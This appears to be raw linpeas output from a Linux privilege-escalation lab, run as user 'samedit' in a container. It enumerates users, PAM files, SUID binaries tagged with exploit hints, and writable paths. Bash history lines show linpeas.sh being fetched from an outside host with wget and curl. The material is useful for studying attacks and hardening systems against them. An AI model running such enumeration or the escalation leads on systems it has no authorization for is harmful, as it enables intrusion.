-e
Running Service Processes:

╔══════════╣ Internet Access?
Neither curl nor wget available
  ping not found
DNS accessible
Port 443 is not accessible
Port 80 is not accessible

══╣ Proxy discovery
╚ Checking common proxy env vars and apt proxy config



                               ╔═══════════════════╗
═══════════════════════════════╣ Users Information ╠═══════════════════════════════
                               ╚═══════════════════╝
╔══════════╣ My user
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users
uid=1000(samedit) gid=1000(samedit) groups=1000(samedit)

╔══════════╣ PGP Keys and Related Files
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys
GPG:
gpg Not Found
-e
NetPGP:
netpgpkeys Not Found
-e
PGP Related Files:

╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
Sorry, try again.
[sudo] password for samedit:


╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens
ptrace protection is enabled (1)
Sudo token directory perms:
drwx------ 2 root root 4096 Feb 21 20:33 /var/run/sudo/ts

doas.conf Not Found

╔══════════╣ Checking Pkexec and Polkit
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html#pe---method-2

══╣ Polkit Binary

══╣ Polkit Policies

══╣ Polkit Authentication Agent

╔══════════╣ Superusers and UID 0 Users
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/interesting-groups-linux-pe/index.html

══╣ Users with UID 0 in /etc/passwd
root:x:0:0:root:/root:/bin/bash

══╣ Users with sudo privileges in sudoers

╔══════════╣ Users with console
root:x:0:0:root:/root:/bin/bash
samedit:x:1000:1000::/home/samedit:/bin/bash

╔══════════╣ All users & groups
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(samedit) gid=1000(samedit) groups=1000(samedit)
uid=101(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)

╔══════════╣ Currently Logged in Users

══╣ Basic user information
 20:34:07 up 544 days,  2:56,  1 user,  load average: 0.04, 0.11, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
samedit  pts/0    10.0.240.248     20:32   26.00s  0.10s  0.00s /bin/sh /tmp/linpeas.sh

══╣ Active sessions
 20:34:07 up 544 days,  2:56,  1 user,  load average: 0.04, 0.11, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
samedit  pts/0    10.0.240.248     20:32   26.00s  0.10s  0.00s w

══╣ Logged in users (utmp)
samedit  + pts/0        Feb 21 20:32   .            38 (10.0.240.248)

══╣ SSH sessions

══╣ Screen sessions

══╣ Tmux sessions

╔══════════╣ Last Logons and Login History

══╣ Last logins
samedit  pts/0        10.0.240.248     Sat Feb 21 20:32   still logged in
samedit  pts/0        10.0.240.248     Sat Feb 21 20:23 - 20:31  (00:07)

wtmp begins Sat Feb 21 20:23:56 2026

══╣ Failed login attempts

══╣ Recent logins from auth.log (limit 20)

══╣ Last time logon each user
Username         Port     From             Latest
samedit          pts/0    10.0.240.248     Sat Feb 21 20:32:19 +0000 2026

╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)

╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!



                             ╔══════════════════════╗
═════════════════════════════╣ Software Information ╠═════════════════════════════
                             ╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/gcc
/usr/bin/make
/usr/bin/perl
/usr/bin/python3
/usr/bin/sudo

╔══════════╣ Installed Compilers
ii  gcc                        4:9.3.0-1ubuntu2             amd64        GNU C compiler
ii  gcc-9                      9.4.0-1ubuntu1~20.04.2       amd64        GNU C compiler
/usr/bin/gcc

╔══════════╣ Browser Profiles
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#browser-data

╔══════════╣ Analyzing PAM Auth Files (limit 70)
drwxr-xr-x 1 root root 4096 Feb 14 00:32 /etc/pam.d
-rw-r--r-- 1 root root 2133 Apr 11  2025 /etc/pam.d/sshd
account    required     pam_nologin.so
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
session    required     pam_loginuid.so
session    optional     pam_keyinit.so force revoke
session    optional     pam_motd.so  motd=/run/motd.dynamic
session    optional     pam_motd.so noupdate
session    optional     pam_mail.so standard noenv # [1]
session    required     pam_limits.so
session    required     pam_env.so # [1]
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open

drwxr-xr-x 1 root root 4096 Feb 14 00:32 /etc/pam.d
-rw-r--r-- 1 root root 4126 Apr 16  2020 /etc/pam.d/login
-rw-r--r-- 1 root root 1208 Apr  4  2025 /etc/pam.d/common-account
account required                        pam_permit.so
-rw-r--r-- 1 root root 581 Feb  7  2020 /etc/pam.d/chsh
auth            sufficient      pam_rootok.so
-rw-r--r-- 1 root root 1435 Apr  4  2025 /etc/pam.d/common-session-noninteractive
session [default=1]                     pam_permit.so
session required                        pam_permit.so
-rw-r--r-- 1 root root 138 Jul 28  2019 /etc/pam.d/runuser-l
-rw-r--r-- 1 root root 1437 Apr  4  2025 /etc/pam.d/common-session
session [default=1]                     pam_permit.so
session required                        pam_permit.so
-rw-r--r-- 1 root root 520 Dec 17  2019 /etc/pam.d/other
-rw-r--r-- 1 root root 137 Jul 28  2019 /etc/pam.d/su-l
-rw-r--r-- 1 root root 92 Feb  7  2020 /etc/pam.d/newusers
-rw-r--r-- 1 root root 2257 Jul 28  2019 /etc/pam.d/su
auth       sufficient pam_rootok.so
-rw-r--r-- 1 root root 1440 Apr  4  2025 /etc/pam.d/common-password
password        required                        pam_permit.so
-rw-r--r-- 1 root root 92 Feb  7  2020 /etc/pam.d/chpasswd
-rw-r--r-- 1 root root 92 Feb  7  2020 /etc/pam.d/passwd
-rw-r--r-- 1 root root 384 Feb  7  2020 /etc/pam.d/chfn
auth            sufficient      pam_rootok.so
-rw-r--r-- 1 root root 143 Jul 28  2019 /etc/pam.d/runuser
auth            sufficient      pam_rootok.so
-rw-r--r-- 1 root root 1214 Apr  4  2025 /etc/pam.d/common-auth
auth    [success=1 default=ignore]      pam_unix.so nullok
auth    required                        pam_permit.so
-rw-r--r-- 1 root root 239 Feb  3  2020 /etc/pam.d/sudo
-rw-r--r-- 1 root root 2133 Apr 11  2025 /etc/pam.d/sshd


╔══════════╣ Analyzing Keyring Files (limit 70)
drwxr-xr-x 2 root root 4096 Apr  4  2025 /usr/share/keyrings




╔══════════╣ Analyzing Proxy Config Files (limit 70)
-rw-r--r-- 1 root root 106 Apr  4  2025 /etc/environment



╔══════════╣ Analyzing Other Interesting Files (limit 70)
-rw-r--r-- 1 root root 3771 Feb 25  2020 /etc/skel/.bashrc
-rw-r--r-- 1 samedit samedit 3771 Feb 25  2020 /home/samedit/.bashrc





-rw-r--r-- 1 root root 807 Feb 25  2020 /etc/skel/.profile
-rw-r--r-- 1 samedit samedit 807 Feb 25  2020 /home/samedit/.profile






MySQL process not found.
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
gpg Not Found
netpgpkeys Not Found
netpgp Not Found

-rw-r--r-- 1 root root 2796 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
-rw-r--r-- 1 root root 2794 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
-rw-r--r-- 1 root root 1733 Mar 29  2021 /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg










╔══════════╣ Searching uncommon passwd files (splunk)
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/lintian/overrides/passwd

╔══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)





-rw-r--r-- 1 root root 182 Feb 14 00:32 /etc/ssh/ssh_host_ecdsa_key.pub
-rw-r--r-- 1 root root 102 Feb 14 00:32 /etc/ssh/ssh_host_ed25519_key.pub
-rw-r--r-- 1 root root 574 Feb 14 00:32 /etc/ssh/ssh_host_rsa_key.pub

ChallengeResponseAuthentication no
UsePAM yes
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server

══╣ /etc/hosts.allow file found, trying to read the rules:
/etc/hosts.allow


Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes




                      ╔════════════════════════════════════╗
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
                      ╚════════════════════════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
strace Not Found
-rwsr-xr-x 1 root root 39K Apr  9  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 55K Apr  9  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 52K Feb  6  2024 /usr/bin/chsh
-rwsr-xr-x 1 root root 67K Apr  9  2024 /usr/bin/su
-rwsr-xr-x 1 root root 44K Feb  6  2024 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 67K Feb  6  2024 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 84K Feb  6  2024 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 87K Feb  6  2024 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 163K Feb  3  2020 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 467K Apr 11  2025 /usr/lib/openssh/ssh-keysign

╔══════════╣ SGID
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
-rwxr-sr-x 1 root shadow 43K Jan 10  2024 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 43K Jan 10  2024 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 83K Feb  6  2024 /usr/bin/chage
-rwxr-sr-x 1 root shadow 31K Feb  6  2024 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 343K Apr 11  2025 /usr/bin/ssh-agent

╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls
files with acls in searched folders Not Found

╔══════════╣ Capabilities
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities
══╣ Current shell capabilities
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000

══╣ Parent proc capabilities
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000


Files with capabilities (limited to 50):

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso
/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf

/etc/ld.so.conf.d
  /etc/ld.so.conf.d/libc.conf
  - /usr/local/lib
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files
total 12
drwxr-xr-x 2 root root 4096 Apr  4  2025 .
drwxr-xr-x 1 root root 4096 Feb 21 20:19 ..
-rw-r--r-- 1 root root   96 Dec  5  2019 01-locale-fix.sh

╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No

╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/root/

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)

╔══════════╣ Readable files belonging to root and readable by me but not world readable

╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
/home/samedit
/run/lock
/tmp
/tmp/linpeas.sh
/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
  Group samedit:
/tmp/linpeas.sh


╔══════════╣ Writable root-owned executables I can modify (max 200)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
Writable root-owned executables Not Found



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
                            ╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path

╔══════════╣ Executable files potentially added by user (limit 70)
2026-02-21+20:32:53.7850173280 /tmp/linpeas.sh
2026-02-21+20:19:32.3345140070 /.dockerenv

╔══════════╣ Unexpected in root
/app
/.dockerenv

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/btmp
/var/log/wtmp
/var/log/lastlog
/home/samedit/.bash_history
/home/samedit/.python_history

╔══════════╣ Syslog configuration (limit 50)
syslog configuration Not Found
╔══════════╣ Auditd configuration (limit 50)
auditd configuration Not Found
╔══════════╣ Log files with potentially weak perms (limit 50)
105276030     32 -rw-r-----   1 root     adm         29005 Feb 14 00:32 /var/log/apt/term.log

╔══════════╣ Files inside /home/samedit (limit 20)
total 36
drwxr-xr-x 1 samedit samedit 4096 Feb 21 20:32 .
drwxr-xr-x 1 root    root    4096 Feb 14 00:33 ..
-rw------- 1 samedit samedit  114 Feb 21 20:31 .bash_history
-rw-r--r-- 1 samedit samedit  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 samedit samedit 3771 Feb 25  2020 .bashrc
drwx------ 2 samedit samedit 4096 Feb 21 20:23 .cache
-rw-r--r-- 1 samedit samedit  807 Feb 25  2020 .profile
-rw------- 1 samedit samedit    0 Feb 21 20:32 .python_history
drwx------ 2 samedit samedit 4096 Feb 14 00:33 .ssh

╔══════════╣ Files inside others home (limit 20)

╔══════════╣ Searching installed mail applications

╔══════════╣ Mails (limit 50)

╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Apr 15  2020 /var/backups
total 0


╔══════════╣ Backup files (limited 100)


╔══════════╣ Web files?(output limit)

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 samedit samedit 220 Feb 25  2020 /home/samedit/.bash_logout
-rw------- 1 root root 0 Apr  4  2025 /etc/.pwd.lock
-rw-r--r-- 1 root root 220 Feb 25  2020 /etc/skel/.bash_logout

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rwxrwxr-x 1 samedit samedit 913470 Feb 21 20:32 /tmp/linpeas.sh

╔══════════╣ Searching passwords in history files
/home/samedit/.bash_history:wget http://10.0.240.248:8000/linpeas.sh
/home/samedit/.bash_history:curl http://10.0.240.248:8000/linpeas.sh -o linpeas.sh

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/share/pam/common-password
/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
/var/log/apt/history.log:Commandline: apt-get install --reinstall base-passwd
/var/log/apt/history.log:Commandline: apt-get install --reinstall passwd
/var/log/apt/history.log:Reinstall: base-passwd:amd64 (3.5.47)
/var/log/apt/history.log:Reinstall: passwd:amd64 (1:4.8.1-1ubuntu5)
/var/log/bootstrap.log: base-passwd depends on libc6 (>= 2.8); however:
/var/log/bootstrap.log: base-passwd depends on libdebconfclient0 (>= 0.145); however:
/var/log/bootstrap.log:Preparing to unpack .../base-passwd_3.5.47_amd64.deb ...
/var/log/bootstrap.log:Preparing to unpack .../passwd_1%3a4.8.1-1ubuntu5_amd64.deb ...
/var/log/bootstrap.log:Selecting previously unselected package base-passwd.
/var/log/bootstrap.log:Selecting previously unselected package passwd.
/var/log/bootstrap.log:Setting up base-passwd (3.5.47) ...
/var/log/bootstrap.log:Setting up passwd (1:4.8.1-1ubuntu5) ...
/var/log/bootstrap.log:Shadow passwords are now on.
/var/log/bootstrap.log:Unpacking base-passwd (3.5.47) ...
/var/log/bootstrap.log:Unpacking base-passwd (3.5.47) over (3.5.47) ...
/var/log/bootstrap.log:Unpacking passwd (1:4.8.1-1ubuntu5) ...
/var/log/bootstrap.log:dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
/var/log/dpkg.log:2025-04-04 02:03:25 configure base-passwd:amd64 3.5.47 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:25 install base-passwd:amd64 <none> 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:25 status half-configured base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:25 status half-installed base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:25 status installed base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:25 status unpacked base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:26 status half-configured base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:26 status half-installed base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:26 status unpacked base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:26 upgrade base-passwd:amd64 3.5.47 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:30 install passwd:amd64 <none> 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:03:30 status half-installed passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:03:30 status unpacked passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:03:31 configure base-passwd:amd64 3.5.47 <none>
/var/log/dpkg.log:2025-04-04 02:03:31 status half-configured base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:31 status installed base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:31 status unpacked base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:32 configure passwd:amd64 1:4.8.1-1ubuntu5 <none>
/var/log/dpkg.log:2025-04-04 02:03:32 status half-configured passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:03:32 status installed passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:03:32 status unpacked passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:03:48 configure base-passwd:amd64 3.5.47 <none>
/var/log/dpkg.log:2025-04-04 02:03:48 status half-configured base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:48 status half-installed base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:48 status installed base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:48 status unpacked base-passwd:amd64 3.5.47
/var/log/dpkg.log:2025-04-04 02:03:48 upgrade base-passwd:amd64 3.5.47 3.5.47
/var/log/dpkg.log:2025-04-04 02:08:25 configure passwd:amd64 1:4.8.1-1ubuntu5 <none>
/var/log/dpkg.log:2025-04-04 02:08:25 status half-configured passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:08:25 status half-installed passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:08:25 status installed passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:08:25 status unpacked passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:08:25 upgrade passwd:amd64 1:4.8.1-1ubuntu5 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:09:12 configure passwd:amd64 1:4.8.1-1ubuntu5.20.04.5 <none>
/var/log/dpkg.log:2025-04-04 02:09:12 status half-configured passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:09:12 status half-configured passwd:amd64 1:4.8.1-1ubuntu5.20.04.5
/var/log/dpkg.log:2025-04-04 02:09:12 status half-installed passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:09:12 status installed passwd:amd64 1:4.8.1-1ubuntu5.20.04.5
/var/log/dpkg.log:2025-04-04 02:09:12 status unpacked passwd:amd64 1:4.8.1-1ubuntu5
/var/log/dpkg.log:2025-04-04 02:09:12 status unpacked passwd:amd64 1:4.8.1-1ubuntu5.20.04.5
/var/log/dpkg.log:2025-04-04 02:09:12 upgrade passwd:amd64 1:4.8.1-1ubuntu5 1:4.8.1-1ubuntu5.20.04.5

╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars
HOME=/home/samedit
LOGNAME=samedit
MOTD_SHOWN=pam
OLDPWD=/home/samedit
PWD=/tmp
SHELL=/bin/bash
SHLVL=1
SSH_CLIENT=10.0.240.248 62809 22
SSH_CONNECTION=10.0.240.248 62809 10.42.6.37 22
SSH_TTY=/dev/pts/0
TERM=xterm-256color
USER=samedit
_=/tmp/linpeas.sh


                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
                                ╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
